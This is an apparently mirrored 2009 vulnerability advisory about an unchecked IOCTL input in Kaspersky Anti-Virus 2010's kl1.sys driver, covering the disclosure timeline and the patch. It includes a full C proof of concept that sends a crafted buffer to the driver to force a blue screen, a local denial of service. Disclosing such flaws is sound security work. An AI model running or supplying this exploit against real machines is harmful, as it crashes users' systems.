Kaspersky Anti-Virus 2010 <= 9.0.0.463 pointer dereference vulnerability

2009-11-17T00:00:00
ID SECURITYVULNS:DOC:22793
Type securityvulns
Reporter Securityvulns
Modified 2009-11-17T00:00:00

Description

/* Program : Kaspersky Anti-Virus 2010 9.0.0.463 Homepage : http://www.kaspersky.com Discovery : 2009/09/29 Author Contacted : 2009/10/01 Patch Updated : 2009/11/16 Found by : Heurs This Advisory : Heurs Contact : s.leberre@sysdream.com

//----- Application description

The most trusted virus and spyware protection - premium protection against viruses, spyware, Trojans, worms, bots and more. Also includes comprehensive phishing and identity theft defense and superfast performance.

//----- Description of vulnerability

kl1.sys driver don't check inputs address of an IOCTL. An exception can be thrown if we modify one or two DWORDs. With my test I can't do best exploitation than a BSOD.

//----- Credits

http://www.sysdream.com http://ghostsinthestack.org

s.leberre at sysdream dot com heurs at ghostsinthestack dot org

//----- Greetings

Trance

*/

include <stdio.h>

include <windows.h>

include <winioctl.h>

include <stdlib.h>

include <string.h>

int __cdecl main(int argc, char* argv[]) { HANDLE hDevice = (HANDLE) 0xffffffff; DWORD NombreByte; DWORD Crashing[] = { 0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a, 0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961, 0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9, 0xb5ebadc5 }; BYTE Out[0x20];

printf&#40;&quot;Local DoS - Kaspersky 2010 9.0.0.463&#92;n&#92;n&quot;&#41;;
hDevice = CreateFile&#40;&quot;&#92;&#92;&#92;&#92;.&#92;&#92;kimul25&quot;,GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL&#41;;

DeviceIoControl&#40;hDevice,0x0022c008,Crashing,sizeof&#40;Crashing&#41;,Out,sizeof&#40;Out&#41;,&amp;NombreByte,NULL&#41;;

printf&#40;&quot;Sploit Send.&#92;nhDevice = &#37;x&#92;n&quot;, hDevice&#41;;
CloseHandle&#40;hDevice&#41;;
getch&#40;&#41;;
return 0;

}